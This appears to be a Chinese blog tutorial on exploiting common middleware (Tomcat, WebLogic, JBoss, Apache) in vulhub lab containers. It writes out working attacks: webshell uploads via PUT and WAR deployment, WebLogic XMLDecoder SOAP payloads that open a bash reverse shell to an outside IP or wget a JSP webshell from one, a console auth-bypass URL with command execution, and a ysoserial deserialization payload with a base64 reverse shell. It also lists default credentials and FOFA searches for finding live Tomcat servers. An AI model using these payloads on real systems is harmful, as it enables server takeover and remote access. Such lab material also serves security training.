常见中间件漏洞(tomcat,weblogic,jboss,apache)

纯净的灰〃2025-01-05 8:05

先准备好今天要使用的木马文件

使用哥斯拉生成木马

压缩成zip文件 改名为war后缀

一:Tomcat

1.1CVE-2017-12615

环境搭建

复制代码 
cd vulhub-master/tomcat/CVE-2017-12615
docker-compose up -d

1.首页抓包,修改为 PUT 方式提交 发送shell.jsp 和木马内容 201创建成功

2.访问木马页面空白 就说明上传成功

3.回到哥斯拉 连接 密码和密钥 生成木马没改 这里连接也不用改

进入终端执行命令

1.2后台弱口令部署var包

环境搭建

复制代码 
cd vulhub-master/tomcat/tomcat8 
docker-compose up -d

1.制作WAR包

制作WAR包,将JSP⽊⻢压缩为ZIP格式,然后修改后缀为war就可以了。

var包相当于压缩包

2.弱密码登录 tomcat tomcat

3.上传war文件并访问

选择var文件用来上传

访问木马地址 页面空白 说明上传成功

4.连接马

1.3 CVE_2020-1938

环境搭建

复制代码 
cd vulhub-master/tomcat/CVE-2020-1938 
docker-compose up -d

1.POC 攻击

tomcat有一个配置文件 /web_inf/web.xml

复制代码 
python cve-2020-1938.py -p 8009 -f /WEB-INF/web.xml 靶机IP

1.4实战挖洞

复制代码 
fofa
app=
"tomcat"
server=
"Apache Tomcat" && body=
"Apache Tomcat"

  
识别:如果给你⼀个⽹站你怎么判断它使⽤了tomcat这个中间件呢

1.默认端⼝ 8080 2.浏览器的指纹识别插件
3.默认管理路由 /manage/html
4.server头 Apache Tomcat

指纹识别 识别网站用了什么技术

tomcat 8 /manage里面有内容 9删掉了后台

二、Weblogic

2.1后台弱口令GetShell

环境搭建

复制代码 
cd vulhub-master/weblogic/weak_password
docker-compose up -d

这个报错页面是默认的weblogic页面

1.进入/console 弱口令登录

默认账号密码:weblogic/Oracle@123

weblogic常⽤弱⼝令:https://cirt.net/passwords?criteria=weblogic

这⾥注意, 单个账号错误密码5次之后就会⾃动锁定。

访问 登录成功

2.上传马

一直点下一步 完成安装

上传以后访问 页面空白说明上传成功

3.连接马

2.2CVE-2017-3506

环境搭建

复制代码 
cd vulhub-master/weblogic/weak_password
docker-compose up -d

1.验证是否存在wls-wsat组件

访问以下⽬录中的⼀种,有回显如下图可以判断wls-wsat组件存在

复制代码 
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11

2.在当前页面抓包之后,添加下面请求包,反弹shell

右键 改变请求方法

添加请求数据包

复制代码 
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
        <java version="1.8.0_131" class="java.beans.XMLDecoder">
          <object class="java.lang.ProcessBuilder">
            <array class="java.lang.String" length="3">
              <void index="0">
                <string>/bin/bash</string>
              </void>
              <void index="1">
                <string>-c</string>
              </void>
              <void index="2">
                <string>bash -i &gt;&amp; /dev/tcp/124.221.58.83/6666 0&gt;&amp;1</string>
              </void>
            </array>
          <void method="start"/></object>
        </java>
      </work:WorkContext>
    </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>

3.本机开启监听

复制代码 
nc -lvvp 8888

修改 Content-Type: text/xml

端口正常

2.3 CVE-2019-2725

环境搭建

复制代码 
cd vulhub-master/weblogic/weak_password
docker-compose up -d

1.漏洞验证

_async/AsyncResponseService

2.远程部署马

访问部署马81端口

3.在当前页面抓包 , 修改请求包 , 写入shell

复制代码 
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget http://114.132.92.17/2.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/678.jsp
</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header><soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
木马位置:http://ip:7001/bea_wls_internal/678.jsp

4.访问木马 页面空白说明文件上传成功

5.连接马

2.4 CVE-2018-2628

环境搭建

复制代码 
cd vulhub-master/weblogic/CVE-2018-2628 
docker-compose up -d

1.使用漏洞利用工具检查

2.5 CVE-2018-2894

环境搭建

复制代码 
cd vulhub-master/weblogic/CVE-2018-2894 
docker-compose up -d

这⾥环境后台密码是随机得,获取密码: docker-compose logs | grep password

进入/console 登录

1.设置Web服务测试开启点击保存

2.进入 config.do ⽂件进⾏设置

复制代码 
121.40.229.129:7001/ws_utc/config.do

进入修改当前工作目录

复制代码 
/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

3.上传马

提交后在查看器查找木马上传位置

4.访问马 页面空白说明上传成功

5.连接马

2.6 CVE-2020-14882

环境搭建

复制代码 
cd vulhub-master/weblogic/CVE-2020-14882 
docker-compose up -d

1.访问管理控制台

/console 来到工作台

2.使用url绕过登录

复制代码 
/console/css/%252e%252e%252fconsole.portal

第一次进入404正常

继续访问 即可绕过登录

3.远程加载xml 获取shell

复制代码 
/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success');")

404 是正常的 来到终端查看是否上传成功

反弹shell

设置反弹shell

改名字

重新开端口监听6666

命令实在1.xml里面写的收到反弹shell

三:Jboss

3.1 CVE-2015-7501

环境搭建

复制代码 
cd vulhub-master/jboss/JMXInvokerServlet-deserialization
docker-compose up -d

1.POC 访问地址

复制代码 
http://121.40.229.129:8080/invoker/JMXInvokerServlet

返回如下,说明接口开放,此接口存在反序列化漏洞

2.下载 ysoserial ⼯具进行漏洞利用

先本地开启反弹shell的监听接口

将反弹shell进⾏base64编码

复制代码 
bash -i >& /dev/tcp/8.155.8.82/8888 0>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC84LjE1NS44LjgyLzg4ODggMD4mMQ==

curl http://8.155.7.133:8080/invoker/JMXInvokerServlet --data-binary @exp.ser

工具目录进入cmd

复制代码 
java8 -jar ysoserial-all.jar CommonsCollections5 "bash -c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84LjE1NS44LjgyLzg4ODggMD4mMQ==}|{base64,-d}|{bash,-i} ">exp.ser

3.执行命令

复制代码 
curl http://8.155.8.82:8080/invoker/JMXInvokerServlet --data-binary @exp.ser

4.成功反弹

3.2 CVE-2017-7504

环境搭建

复制代码 
cd vulhub-master/jboss/CVE-2017-7504 
docker-compose up -d

1.测试漏洞

复制代码 
/jbossmq-httpil/HTTPServerILServlet

2.工具探测

复制代码 
python3 jexboss.py -u http://8.155.8.82:8080

3.3 CVE-2017-12149

环境搭建

复制代码 
cd vulhub-master/jboss/CVE-2017-12149 
docker-compose up -d

1.访问漏洞页面

2.验证是否存在漏洞 , 访问

复制代码 
http://8.155.8.82:8080/invoker/readonly
复制代码 
访问地址:/invoker/readonly
该漏洞出现在/invoker/readonly中 ,服务器将用户post请求内容进行反序列化

返回500,说明页面存在,此页面存在反序列化漏洞

3.使用工具进行检测 DeserializeExploit 如果成功直接上传webshell即可

3.4 Administration Console弱口令

环境搭建

复制代码 
cd vulhub-master/jboss/CVE-2017-12149 
docker-compose up -d

密码文件

复制代码 
/jboss-6.1.0.Final/server/default/conf/props/jmx-console-users.properties
账户:密码admin:vulhub

访问地址:/admin-console/login.seam

登录后台 上传木马文件

进行木马连接

复制代码 
http://IP:8080/shell/shell.jsp

3.5 低版本JMX Console未授权

环境搭建

复制代码 
cd vulhub-master/jboss/CVE-2017-7504
docker-compose up -d

访问 /jmx-console 正常不需要登录 这里漏洞不存在 需要登录admin admin

远程部署war包

复制代码 
python3 -m http.server 81

war包访问成功

来到靶机

复制代码 
 http://8.155.8.82:81/java.war //填入ParamValue

访问

进行木马连接

3.6 高版本JMX Console未授权

环境搭建

复制代码 
cd vulhub-master/jboss/CVE-2017-12149 
docker-compose up -d

访问 /jmx-console

因为使⽤环境不存在该漏洞所以需要输⼊账户密码:admin vulhub

搭建远程部署 , 部署远程war包地址

在JMX Console⻚⾯点击jboss.system链接,在Jboss.system⻚⾯中点击service=MainDeployer

进⼊service=MainDeployer⻚⾯之后,找到methodIndex为17或19的deploy 填写远程war包地址进⾏

远程部署

进行木马连接

四、Apache

环境搭建 拉取并开启

复制代码 
docker pull blueteamsteve/cve-2021-41773:no-cgid
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid

开启靶场

1.使用POC

2.工具验证

相关推荐
碳烤小肥杨..3 小时前
DHCP中继实验
网络·网络协议·网络安全
数字供应链安全产品选型5 小时前
中国软件供应链安全技术指南|DevSecOps敏捷安全技术金字塔V3.0正式发布
安全
同创永益6 小时前
从被动响应到主动防御——IT 应急演练平台 v3.0.1 重构企业安全免疫系统
安全·重构·it·同创永益·数字韧性
网安-轩逸8 小时前
HTTP与HTTPS的深度解析:技术差异、安全机制及应用场景
安全·http·https
数字供应链安全产品选型9 小时前
安全左移动赋能:灵脉IAST交互式应用安全测试平台
网络·人工智能·安全·开源·开源软件
橘猫云计算机设计9 小时前
基于jspm校园安全管理系统(源码+lw+部署文档+讲解),源码可白嫖!
java·spring boot·安全·毕业设计
vvilkim9 小时前
Web安全:保护您的网站免受网络威胁
网络·安全·web安全
He_Donglin10 小时前
现代密码学 | 具有完整性功能的安全方案
安全·密码学
PagiHi11 小时前
iWebOffice2015 中间件如何在Chrome107及之后的高版本中加载
前端·javascript·chrome·中间件·edge·js
是花花呢13 小时前
华为hcia——Datacom实验指南——以太网帧和IPV4数据包格式(一)
运维·网络·数据库·安全·web安全·华为·华为hcia——datacom
热门推荐
01从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑02如何在WPS和Word/Excel中直接使用DeepSeek功能03DeepSeek各版本说明与优缺点分析04Unity图形学之法线贴图原理05DeepSeek RAGFlow构建本地知识库系统06本地部署DeepSeek教程(Mac版本)07Windows 11 安装 Dify 完整指南 非docker环境08如何本地部署AI智能体平台,带你手搓一个AI Agent09本地化部署AI知识库:基于Ollama+DeepSeek+AnythingLLM保姆级教程10KGG转MP3工具|非KGM文件|解密音频